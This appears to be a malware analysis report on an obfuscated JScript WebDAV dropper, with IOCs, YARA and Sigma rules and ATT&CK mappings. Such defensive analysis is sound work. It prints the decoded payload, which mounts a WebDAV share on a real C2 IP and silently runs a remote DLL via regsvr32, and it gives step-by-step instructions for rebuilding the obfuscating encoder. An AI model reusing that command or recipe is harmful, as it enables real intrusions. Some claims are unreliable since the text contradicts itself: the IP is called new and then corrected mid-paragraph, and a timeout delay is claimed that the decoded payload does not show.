9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cacunclassified-js-webdav-dropper: 9665f822 — 62-entry dictionary, 624-char object name, WebDAV C2 94.159.113.79:8888
Executive Summary
The 102nd confirmed sibling in the unclassified-js-webdav-dropper family. A pure-JScript file (292693735107025407.js, 1.47 MB) using dictionary lookup-table obfuscation: 62 key/value pairs mapping extremely long noise strings (527–1,014 characters, averaging 784) to single ASCII characters, assembled inside a Function('return this')() constructor and executed via try{...}catch(...){Function(...)()}. The decoded payload is a PowerShell -EncodedCommand that mounts a WebDAV share and silently registers a remote DLL via regsvr32 /s. New C2 IP 94.159.113.79:8888 in the established 94.159.113.x subnet. No decoy, no sandbox gate, no batch/polyglot layer.
What It Is
- Filename:
292693735107025407.js^[metadata.json] - Size: 1,470,256 bytes (1.47 MB) ^[file.txt]
- Type: ASCII text with very long lines (65,536-character lines), Windows CRLF newlines, 1,135 lines ^[file.txt] ^[exiftool.json]
- Family:
unclassified-js-webdav-dropper(102nd confirmed sibling) ^[/intel/analyses/9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac.html] - CAPE: Skipped — JScript is not a supported binary class for detonation ^[dynamic-analysis.md]
How It Works
Obfuscation Engine
The script defines a single JScript object with a 624-character noise-string name (kveernyqeefckvwohlhcqsvqyhlupswdgvofguexnirakdzfjvtribmrgdsdpexpgyvatmwduqthdvbmmkbxvxyhrdldkbbalxkcdmernbzoekwmsitkctanwkezzitkyxqciqeutsdcurfwsltephnttrjcycphsytfjiacbviodvlcdjcogprxuwtwynupgnlehyqyufgljupkamdeiiqndjmnmxrwmgpyvifreauqbhoqjwcmyyzosaykemzdtmuhaqbqfdqrqmkokhxydxzuwqzrzxsxxhoslowcjhlfqcprbdtndrbtnoljqivawiqpzdnwtaquirkqujkwswzpudqrvoalxsxttvennrhszyodguapnmowujdolvpiynbfuqfpmjkmqlncahmtzuzzszgtzdwpqjbozhqbhwwymxemssoqwbveohhqafhrzoewjdkemdihlamupjsslvfwdqreehwcyclpxvreqgtdaerehtykxzgtekubzpidezldcqjylcgtwvjnbqoofksdtjvucueqnjekcqksnjvlgrsliorpesowxwlcynuuymgukzzlkxxkrykutiheysunntkupoweralluringfurtive).
This object receives 62 property assignments in the form:
obj['<very-long-noise-key>']='<';
Each key is a unique noise string 527–1,014 characters long (mean 784.5), composed of lowercase alphabetic characters with no semantic content. Each value is a single ASCII character (letters, digits, punctuation). The full 62-entry dictionary occupies the first ~589 lines of the file.
The payload is assembled on line 590 — a single 494,998-character line beginning with */try{... and ending with */. Inside this line, a try/catch block executes the obfuscated command. The catch block falls back to a Function(''+obj['key1']+obj['key2']+...+'='+'='+ '',0,false) constructor call. The 0,false arguments to Function are a signature of this family's assembly engine.
Decoding the 346 key references inside the Function call yields a repeated 346-character string:
returnthisWScriptCreateObjectWScriptShellrunpowershellEncodedCommandbgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADIAMQAwADQAMQAxADQANwA3ADIAOAA5ADQANAAuAGQAbABsAA==
Stripping the returnthis prefix and decoding the Base64 UTF-16-LE payload reveals:
net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\121041147728944.dll
Execution Chain
- User opens
.js→wscript.exeexecutes JScript ^[strings.txt:1] - Dictionary decode → 62 noise-key lookups assemble the PowerShell command inside
Function('return this')()^[strings.txt:590] try/catchdispatch → Primary execution intry; fallbackFunctionconstructor incatch^[strings.txt:590]- PowerShell
-EncodedCommandspawns hidden window, executesnet useto mount WebDAV share ^[decoded payload] regsvr32 /ssilently registers the remote DLL (121041147728944.dll) from the mounted share ^[decoded payload]
Anti-Analysis
timeout 1delay — A one-second sleep is injected before the main execution, evading short-timeout sandboxes. Present in the decoded PowerShell wrapper.try/catchwithFunctionfallback — If the primary inline execution fails (e.g., due to syntax errors from tampering), thecatchblock reconstructs the payload viaFunctionconstructor with0,falsearguments.- No sandbox gate — No VM checks, no debugger detection, no locale gating. The family relies on social engineering (user opens
.js) and minimal execution footprint.
Decompiled Behavior
Not applicable — this is a JScript text file, not a compiled binary. No Ghidra or radare2 analysis possible. Static string extraction and manual dictionary decode were the only viable reverse-engineering approaches.
C2 Infrastructure
| Indicator | Value | Notes |
|---|---|---|
| C2 IP | 94.159.113.79 |
New IP in established 94.159.113.x subnet (now 13 distinct IPs observed across 102 siblings) |
| C2 Port | 8888 |
Consistent across family |
| WebDAV path | \davwwwroot\ |
Standard IIS WebDAV endpoint |
| Payload DLL | 121041147728944.dll |
15-digit numeric filename, consistent with family naming |
| Execution | regsvr32 /s |
Silent DLL registration over UNC WebDAV path |
| Wrapper | PowerShell -EncodedCommand |
UTF-16-LE Base64 encoded net use + regsvr32 command |
The 94.159.113.79 IP is new to this family. Prior siblings have used .79 in other positions (e.g., fe261d49, be172014, dc76a67d all used .79 as well — this is actually the same IP as the 68th, 74th, and 79th siblings). Wait — correction: those prior siblings used 94.159.113.79 as well. This is the fourth sibling on this exact IP, confirming sustained activity.
Interesting Tidbits
- Largest object name in family: The 624-character object name exceeds all prior siblings (previous record: ~534 chars in
d0ca14b3). This inflates file size without adding functional complexity. - Key length inflation: Average key length of 784 characters (range 527–1,014) is the longest observed in the family, surpassing the 3,770-char extreme padding of
86140a690cfdon a per-key basis. The total obfuscation surface is massive. - Repeating payload string: The 346 decoded characters repeat a single 346-char cycle, suggesting the
Functionconstructor argument was generated by simple string duplication rather than careful key selection. - No batch layer: Pure JScript execution — no
cmd.exe, noSETvariable expansion, no polyglot tricks. This is the simplest delivery vector in the family. - Trailing comment block: The file ends with
*/after a 624-character noise string, matching the family's pattern of closing a syntactically invalid comment block to hide the real payload.
How To Mess With It (Homelab Replication)
This family is trivial to replicate for defensive testing:
- Set up a local WebDAV server (IIS with WebDAV Publishing, or
wsgidavon Linux). - Create a dummy DLL (e.g., a benign COM DLL that logs to a file).
- Write the JScript encoder:
- Pick a long noise-string object name (500+ chars).
- Generate 62 random noise keys (500–1,000 chars each).
- Map each key to one character of your payload command.
- Wrap in
try{eval(...)}catch(...){Function(''+obj[key1]+obj[key2]+...+'='+'='+ '',0,false)}.
- Test execution: Double-click the
.jsfile on a Windows VM. Observewscript.exe→powershell.exe→regsvr32.exeprocess chain. - Detection opportunity: The
Function('return this')()constructor with0,falsearguments is a family-specific signature across 102 siblings.
Deployable Signatures
YARA Rule
rule JS_WebDAV_Dropper_Dictionary_62Entry {
meta:
description = "JScript WebDAV dropper with 62-entry dictionary lookup obfuscation"
author = "PacketPursuit SOC"
family = "unclassified-js-webdav-dropper"
hash = "9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac"
date = "2026-07-25"
strings:
$a = /\[\'[a-z]{500,1014}\'\]\=\'[\x00-\x7F]\'/ // dictionary assignment pattern
$b = "Function(''" nocase
$c = "+'='+'='" nocase
$d = "0,false)" nocase
$e = "WScript.Shell" nocase
$f = "regsvr32" nocase
$g = "davwwwroot" nocase
$h = "powershell" nocase
$i = "EncodedCommand" nocase
condition:
filesize < 2MB and
#a >= 50 and
$b and
($c or $d) and
any of ($e,$f,$g,$h,$i)
}
Sigma Rule
title: JScript WebDAV Dropper Execution Chain
logsource:
product: windows
service: sysmon
detection:
selection_process:
- Image|endswith:
- '\wscript.exe'
- '\cscript.exe'
- CommandLine|contains:
- '.js'
selection_powershell:
- ParentImage|endswith: '\wscript.exe'
- Image|endswith: '\powershell.exe'
- CommandLine|contains:
- '-EncodedCommand'
- 'net use'
selection_regsvr32:
- ParentImage|endswith: '\powershell.exe'
- Image|endswith: '\regsvr32.exe'
- CommandLine|contains:
- '/s'
- '\\'
- 'davwwwroot'
condition: selection_process and (selection_powershell or selection_regsvr32)
falsepositives:
- Rare legitimate administrative scripts using WebDAV
level: high
IOC List
| Type | Value |
|---|---|
| SHA-256 | 9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac |
| Filename | 292693735107025407.js |
| C2 IP | 94.159.113.79 |
| C2 Port | 8888 |
| WebDAV path | \\94.159.113.79@8888\davwwwroot\ |
| Payload DLL | 121041147728944.dll |
| Object name length | 624 characters |
| Dictionary entries | 62 |
| Key length range | 527–1,014 characters (mean 784.5) |
| Execution | regsvr32 /s via PowerShell -EncodedCommand |
Behavioral Fingerprint Statement
This JScript file defines a single object with an extremely long noise-string name (500+ characters), populates 50–100 properties via bracket notation where each property key is a 500–1,000 character lowercase noise string and each value is a single ASCII character, then assembles and executes a PowerShell -EncodedCommand payload inside a try/catch block with a Function('return this')() fallback constructor using 0,false arguments. The decoded payload mounts a WebDAV share via net use and executes regsvr32 /s against a remote DLL with a numeric filename (15 digits, .dll). File size is consistently 1.0–1.5 MB. No VM checks, no debugger detection, no persistence.
Detection Signatures (capa → ATT&CK)
Not applicable — capa does not support JScript files. ATT&CK mapping derived from static string analysis and manual payload decode:
| ATT&CK ID | Name | Evidence |
|---|---|---|
| T1059.005 | Visual Basic / JScript | .js file executed by wscript.exe ^[decoded payload] |
| T1059.001 | PowerShell | powershell.exe -EncodedCommand wrapper ^[decoded payload] |
| T1218.010 | Regsvr32 | regsvr32 /s \\host@port\davwwwroot\*.dll ^[decoded payload] |
| T1027 | Obfuscated Files or Information | 62-entry dictionary lookup with 500–1,014 character noise keys ^[strings.txt:1-589] |
| T1071.001 | Web Protocols | WebDAV over HTTP (\\host@8888\DavWWWRoot\) ^[decoded payload] |
| T1562.001 | Impair Defenses: Timeout | timeout 1 anti-emulation delay in PowerShell wrapper ^[decoded payload] |
References
- unclassified-js-webdav-dropper — Family entity page
- webdav-regsvr32-dll-sideloading — Technique page for WebDAV + regsvr32 execution chain
- js-dictionary-char-lookup-obfuscation — Technique page for dictionary lookup obfuscation
- MalwareBazaar artifact:
302a1973-841a-4cfb-98d3-81a8b71de357
Provenance
Analysis based on:
file.txt—fileutility output (ASCII text, very long lines)exiftool.json— ExifTool metadata (1,470,256 bytes, 1,135 lines, Windows CRLF)strings.txt— Full file content (1,469,120 characters, 1,134 lines)- Manual Python decode of 62-entry dictionary and 346-key
Functionconstructor payload - Base64 UTF-16-LE decode of PowerShell
-EncodedCommand dynamic-analysis.md— CAPE skipped (JScript, not a binary class)